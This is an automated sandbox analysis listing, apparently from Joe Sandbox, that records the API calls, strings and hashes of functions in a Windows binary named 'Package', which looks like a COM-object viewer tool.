Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2109#2112#2550#3477#4158#4451#5491#5867#5996#6063
String ID:
API String ID: 1972827604-0
Opcode ID: 01148101288a36b0b5705eca05dec89924959463874e6416e86994af0d00b1a9
Instruction ID: c2fbd5fa609fe5c3bb04427b81749412f004556f2321991bb5f46658ff009103
Opcode Fuzzy Hash: 01148101288a36b0b5705eca05dec89924959463874e6416e86994af0d00b1a9
Instruction Fuzzy Hash: DD11D33533031436EF1066A08C86FEF729EAF80710F140D14B917F61C3DEA0AA608A60

Function 00200CC0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 43windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 00200CCD
SendMessageW.USER32(?,00001061,00000000,?), ref: 00200CF8
SendMessageW.USER32(?,00001061,00000001,?), ref: 00200D1C
#2634.MFC42U(00000000), ref: 00200D2A
#2634.MFC42U(00000000,00000000), ref: 00200D37

Strings

User/Group, xrefs: 00200CE3
Can Launch, xrefs: 00200D0E
j, xrefs: 00200D15

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2634MessageSend$#4704
String ID: Can Launch$User/Group$j
API String ID: 3599582684-3481516568
Opcode ID: 6d3d1148644a07eb40c5fd48eedbeb068a84323022a65e9d0bda835685f2baa4
Instruction ID: f946d86c70c50cc23205a7518f84bb72c14db415198ce2eadca9bc31d80e6309
Opcode Fuzzy Hash: 6d3d1148644a07eb40c5fd48eedbeb068a84323022a65e9d0bda835685f2baa4
Instruction Fuzzy Hash: 14014F719003086FEB20AFA0DC4AFEFBBB8EB45714F010419F655762D0DBB15995CBA1

Function 6C4E582A Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6C4E586D
_strrchr.LIBCMT ref: 6C4E5877
_strrchr.LIBCMT ref: 6C4E588C

Part of subcall function 6C4E5602: HeapFree.KERNEL32(00000000,00000000,?,6C4E4C74), ref: 6C4E5618
Part of subcall function 6C4E5602: GetLastError.KERNEL32(?,?,6C4E4C74), ref: 6C4E5623

Part of subcall function 6C4E551E: IsProcessorFeaturePresent.KERNEL32(00000017,6C4E550D,?,6C4E8FEA,?,6C4E8E7D,00000000,?,00000000,?,6C4E5484,?,00000000,6C4E8E7D,?,6C4E8FEA), ref: 6C4E5520
Part of subcall function 6C4E551E: GetCurrentProcess.KERNEL32(C0000417,6C4E8FEA,?,00000000,?,00000000,?,?,6C4E8FEA,?,6C4E8E7D,00000000,?,00000000,6C4E8E7D,?), ref: 6C4E5543
Part of subcall function 6C4E551E: TerminateProcess.KERNEL32(00000000,?,6C4E8FEA,?,6C4E8E7D,00000000,?,00000000,6C4E8E7D,?,00000000,00000000,6C4F4988,0000002C,6C4E8EEE,?), ref: 6C4E554A

Strings

.com, xrefs: 6C4E5997, 6C4E59A1

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
String ID: .com
API String ID: 3694955208-4200470757
Opcode ID: ef600b02ff02447932202d4b3e8ca756b0fc4e42691ac4b21ab0d32ed409ba32
Instruction ID: 54dc2c0bb23a42135531544bb3e76df572fbd501a7102f0c528ed672e8f78ca2
Opcode Fuzzy Hash: ef600b02ff02447932202d4b3e8ca756b0fc4e42691ac4b21ab0d32ed409ba32
Instruction Fuzzy Hash: 9D5106725082016AEB05DA759C81FEB37699F4E37FF27062DE9049AB81FB21C905C7A0

Function 0020D2F7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 0020D35B
lstrcatW.KERNEL32(?,001F60AC), ref: 0020D376
lstrcatW.KERNEL32(?,?), ref: 0020D37E

Strings

APPID\%s, xrefs: 0020D355
AppID, xrefs: 0020D336

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: lstrcat$wsprintf
String ID: APPID\%s$AppID
API String ID: 3128662910-1823611323
Opcode ID: cef017a234ef237c8325e3edba22c05a3add342e28adfd236f0c08760daeca02
Instruction ID: 6a45c0f94b71f24b0606733b42ba54ce3b9491ded94b4cb15411cda9ca236cd7
Opcode Fuzzy Hash: cef017a234ef237c8325e3edba22c05a3add342e28adfd236f0c08760daeca02
Instruction Fuzzy Hash: EF0184B150031DABCB10EF64DC49DDB77BCEF14704F1081A5B919A3282DA719E498FA0

Function 002016C0 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

#2244.MFC42U(?,00000001,00000002,50000000,0000E900), ref: 002016E1
#3476.MFC42U(00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00201744
#3476.MFC42U(00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00201755
#5848.MFC42U(00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 0020175D
#5906.MFC42U(00000000,000000F0,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 0020176B

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #3476$#2244#5848#5906
String ID:
API String ID: 2288433627-0
Opcode ID: 2d23d5bc05e9754734c819627a383434065ac4f08a17ea0169e07f889312681e
Instruction ID: 14099ddc48bf4d0874de0ec5f7f004b18b24e2e4d36b2ff91c088f6edbec6861
Opcode Fuzzy Hash: 2d23d5bc05e9754734c819627a383434065ac4f08a17ea0169e07f889312681e
Instruction Fuzzy Hash: C111C4317513117BEF245A214C49FBBBA5EEF85760F050425BD06EB2D2DEA06C10CAA0

Function 00201536 Relevance: 7.5, APIs: 5, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0020153D
#366.MFC42U(00000004,00200D8A,00000004), ref: 00201547
#527.MFC42U(00000004,00200D8A,00000004), ref: 0020155C
#529.MFC42U(00000004,00200D8A,00000004), ref: 0020156B
#554.MFC42U(00000004,00200D8A,00000004), ref: 0020157A

Part of subcall function 002015A4: #439.MFC42U ref: 002015B0

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #366#439#527#529#554H_prolog3
String ID:
API String ID: 3098594135-0
Opcode ID: 1483765a33910a9e40f66db9e697b746238494b80a7242685d69c0c4982f04fb
Instruction ID: 08cd20bd888c95339e7ed0fd071d38005f897bc18a16ded3329bf1e818bbbb80
Opcode Fuzzy Hash: 1483765a33910a9e40f66db9e697b746238494b80a7242685d69c0c4982f04fb
Instruction Fuzzy Hash: F0F01770821784CBEB14EBA0C5567EEB6A4BF24315F50488CE5EA132C3DBB42658CE62

Function 00203D3B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00203F53: #303.MFC42U(SysTreeView32,50800000,?,000000FF,?,00203D6D,85C979FC,?,00000000,00210996,000000FF,?,00202096), ref: 00203F69

#540.MFC42U(85C979FC,?,00000000,00210996,000000FF,?,00202096), ref: 00203D80
#1105.MFC42U(00205270,000000FF,00000000,00000000,00000004,00000000), ref: 00203E62

Part of subcall function 00203CFC: #543.MFC42U(00000000,?,00000000,?,00203E30), ref: 00203D0A
Part of subcall function 00203CFC: InitializeCriticalSection.KERNEL32(00000008,00000000,?,00000000,?,00203E30), ref: 00203D19

Strings

`y , xrefs: 00203D74

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #1105#303#540#543CriticalInitializeSection
String ID: `y
API String ID: 4030040872-1912991813
Opcode ID: 1924fab4dcaaa2ea1849a65f46f28a09b9b3ef01e7e21058d64d62f1acc16568
Instruction ID: 1b856e69cb68eb34619d3197de12644d3c24b562db78eb2daed9310de7df8d20
Opcode Fuzzy Hash: 1924fab4dcaaa2ea1849a65f46f28a09b9b3ef01e7e21058d64d62f1acc16568
Instruction Fuzzy Hash: 2141E471A10359DFDB01DF98C99ABAEBBF0BB04315F104559E020AB2E2C7B9AA54CF54

Function 0020D6F5 Relevance: 4.5, APIs: 3, Instructions: 31registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D70D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0020D6E4,?,?,?,0020D6E4,80000000,?,?,?,?,?), ref: 0020D72C
RegCloseKey.ADVAPI32(?,?,?,?,0020D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0020D738

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 39143c035873baf40ab1f28e4833271752d278132bd0f41d73af53df49a5965b
Instruction ID: 5c7d18f1ac98ac59ba06a76f21d07f2a83d57539ce9b45f55df3541330846f3d
Opcode Fuzzy Hash: 39143c035873baf40ab1f28e4833271752d278132bd0f41d73af53df49a5965b
Instruction Fuzzy Hash: 45F0AF7590020EFFDF129F91ED09E9EBBB9EB58344F108065FA05A2161E771EA20AB50

Function 6C4E4167 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,6C4E4161,6C4E1014,6C4E1014,?,00000000,D944A993,6C4E1014,00000000), ref: 6C4E4178
TerminateProcess.KERNEL32(00000000,?,6C4E4161,6C4E1014,6C4E1014,?,00000000,D944A993,6C4E1014,00000000), ref: 6C4E417F
ExitProcess.KERNEL32 ref: 6C4E4191

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2dcecde2196f12012a461902ea36d99af31493585cd6b4319a88fc706ba4e63a
Instruction ID: c0ddb7b615343590a1bd74dc2bfea3609e1aead161bd11b16cdbcbfaf46e9dcc
Opcode Fuzzy Hash: 2dcecde2196f12012a461902ea36d99af31493585cd6b4319a88fc706ba4e63a
Instruction Fuzzy Hash: D2D05E31001108BBDF40FFA0D80CC887F39EF5D38A7125010BC0845522CF318A96EA90

Function 00207F0B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,RH ), ref: 00207F1D

Strings

RH , xrefs: 00207F10

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend
String ID: RH
API String ID: 3850602802-2478294537
Opcode ID: 7698dc83172c61cd63765c08651036b8fb3c4d3992da969dd2aedc0780e8e2c0
Instruction ID: 8d8c45027eadcde9c6d41728ea788391c81e3bf4909fbd42cc83caa8d41b0bec
Opcode Fuzzy Hash: 7698dc83172c61cd63765c08651036b8fb3c4d3992da969dd2aedc0780e8e2c0
Instruction Fuzzy Hash: 0EC04C72180208BBD6116B51EC09FC5BE6AE7A5762F518011B718190A18B7399629654

Function 00203A60 Relevance: 3.1, APIs: 2, Instructions: 105COMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 00203ACD
#2644.MFC42U(?), ref: 00203BA6

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #1662#2644
String ID:
API String ID: 3643970462-0
Opcode ID: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
Instruction ID: 65e1df18ed7c204ab86d25fc9d3d46cfa88eaf7dca38f4f9b9e1a131aeeaef45
Opcode Fuzzy Hash: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
Instruction Fuzzy Hash: 2841A234A20209EFCB54DF94C596DACBBB5BF44318F618499E841AB3A2C771AF61DF00

Function 0020DE06 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

_callnewh.MSVCRT ref: 0020DE11
malloc.MSVCRT ref: 0020DE1E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: _callnewhmalloc
String ID:
API String ID: 2285944120-0
Opcode ID: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
Instruction ID: 9b39e664cc3a5b0642c126e6a89b4c90cc4084eb15ae6d299df20f5971e30dac
Opcode Fuzzy Hash: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
Instruction Fuzzy Hash: B5D0A73626232723CB3129D5DC0045B7A08CB52BB03150031FD0C9E6D3DA11CD7046D0

Function 002095D0 Relevance: 3.0, APIs: 2, Instructions: 19windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 002095D5

Part of subcall function 001FB421: #1172.MFC42U(?,001FB338), ref: 001FB424

Part of subcall function 00209597: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002095A0
Part of subcall function 00209597: #2855.MFC42U(00000000), ref: 002095A7

SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002095FC

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#1172#2855#4704
String ID:
API String ID: 854760084-0
Opcode ID: d32d02297ee79b12404595a68127f3c657efc696addc3f5ece7b92595696d641
Instruction ID: 9d3870334854027b68c1bd49c00eaa8e4c7f5a55014aac3f875b6c0a44ba18b2
Opcode Fuzzy Hash: d32d02297ee79b12404595a68127f3c657efc696addc3f5ece7b92595696d641
Instruction Fuzzy Hash: D0D017312352105FE7217B75ED59FAA2A99EF89320F464461BA46DA0E3CE60DC918A10

Function 6C4E99E0 Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6C4E9A95

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c009080af10f0e77137517782aeae7556aee34615790aa373fd3fd68c7517b42
Instruction ID: bdae9f693b085fa9047cc6875f0becf90e301ebb89ffaeeed564dddb12bd5b19
Opcode Fuzzy Hash: c009080af10f0e77137517782aeae7556aee34615790aa373fd3fd68c7517b42
Instruction Fuzzy Hash: CD3116B2C05258AFDF02EFE9D980DDEBFB9BF1C209F15412EE908A2650D7318954CB90

Function 001FFC60 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

#4435.MFC42U(?,?), ref: 001FFCCC

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #4435
String ID:
API String ID: 3199213920-0
Opcode ID: 2c757ea0aa7e76661cd41b0b790347171f80b6bd2c3acc901a90263728d7e872
Instruction ID: 604c9a18e4508863e198a904fa016ace57a1a2c3875ce184a63dcdf3bd8fa049
Opcode Fuzzy Hash: 2c757ea0aa7e76661cd41b0b790347171f80b6bd2c3acc901a90263728d7e872
Instruction Fuzzy Hash: 8C018B357001699BEF18AB29D858BB9BB65FB84324F45403EED0A87391CB70AD12CBD0

Function 001FEAB0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001FEAB7

Part of subcall function 0020DE06: malloc.MSVCRT ref: 0020DE1E

Part of subcall function 001FEAE6: __EH_prolog3.LIBCMT ref: 001FEAED
Part of subcall function 001FEAE6: #338.MFC42U(0000000C,001FEAD7,00000004), ref: 001FEAF7
Part of subcall function 001FEAE6: #540.MFC42U(0000000C,001FEAD7,00000004), ref: 001FEB0B
Part of subcall function 001FEAE6: #860.MFC42U(001F349E,0000000C,001FEAD7,00000004), ref: 001FEB27
Part of subcall function 001FEAE6: #540.MFC42U ref: 001FEB36
Part of subcall function 001FEAE6: #540.MFC42U ref: 001FEB42
Part of subcall function 001FEAE6: #4155.MFC42U(00000004), ref: 001FEB50
Part of subcall function 001FEAE6: #4155.MFC42U(00000008,00000004), ref: 001FEB5A
Part of subcall function 001FEAE6: #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 001FEB6E
Part of subcall function 001FEAE6: #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEB7E
Part of subcall function 001FEAE6: #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEB8D
Part of subcall function 001FEAE6: #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEB9D
Part of subcall function 001FEAE6: #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEBAC
Part of subcall function 001FEAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEBB7
Part of subcall function 001FEAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 001FEBBF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #3516#540$#4155#800#861H_prolog3$#338#860malloc
String ID:
API String ID: 1769621591-0
Opcode ID: ea411f165cefdb597e5641c019d51099709ae8a6972b09efac728b4ce1b83055
Instruction ID: 5e3e19d404f756e596121d56495d36e2e04dd2a7d133c8a8cb2a97a99fc4a5a9
Opcode Fuzzy Hash: ea411f165cefdb597e5641c019d51099709ae8a6972b09efac728b4ce1b83055
Instruction Fuzzy Hash: FBD0A9A0AA630687EF6CBBF9082232E25E06F04310F90007CB704DA6C2DF7089A08A21

Function 00200D60 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00200D67

Part of subcall function 0020DE06: malloc.MSVCRT ref: 0020DE1E

Part of subcall function 00201536: __EH_prolog3.LIBCMT ref: 0020153D
Part of subcall function 00201536: #366.MFC42U(00000004,00200D8A,00000004), ref: 00201547
Part of subcall function 00201536: #527.MFC42U(00000004,00200D8A,00000004), ref: 0020155C
Part of subcall function 00201536: #529.MFC42U(00000004,00200D8A,00000004), ref: 0020156B
Part of subcall function 00201536: #554.MFC42U(00000004,00200D8A,00000004), ref: 0020157A

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: H_prolog3$#366#527#529#554malloc
String ID:
API String ID: 3012659443-0
Opcode ID: a9499e2478633acf7fde55ecc2a84d305374945cc88da54b9d40b26fdc92284b
Instruction ID: cf49c537dcc3b2775b6bd49fa4317665cbb1e0154da3fbab0e4aa362e17ebdff
Opcode Fuzzy Hash: a9499e2478633acf7fde55ecc2a84d305374945cc88da54b9d40b26fdc92284b
Instruction Fuzzy Hash: B6D0A7A066134297EF58BBF8485231E14905F40310F90007D6644CA6C3DD7085708A25

Function 002015A4 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

#439.MFC42U ref: 002015B0

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #439
String ID:
API String ID: 466583480-0
Opcode ID: 5bb233cd3d043a189f9f5ebfce08b5f3c49065c270478fdc3ef4e59be7d281d4
Instruction ID: e1fbb93d35e807c01e51d32e41d8fafd9b74ebc0961ce06566d79678e1b8361c
Opcode Fuzzy Hash: 5bb233cd3d043a189f9f5ebfce08b5f3c49065c270478fdc3ef4e59be7d281d4
Instruction Fuzzy Hash: 7AC08CB2610268678B106B4D980A88ABADCD9817A4312045AB511B7201EBF09E0287E5

Function 002016A0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

#4146.MFC42U(?,?,?,?), ref: 002016B7

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #4146
String ID:
API String ID: 1848845558-0
Opcode ID: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
Instruction ID: dfed00b97bb9b66f2263b362fdb8fd059d33f5fc52ced556bb34d1082663d609
Opcode Fuzzy Hash: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
Instruction Fuzzy Hash: B4C0123700024DBBCF015E55DC01C9A3B69EB40320B004400FC2845162CB72D870AA60

Function 0020EDF0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

__wgetmainargs.KERNELBASE ref: 0020EE14

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

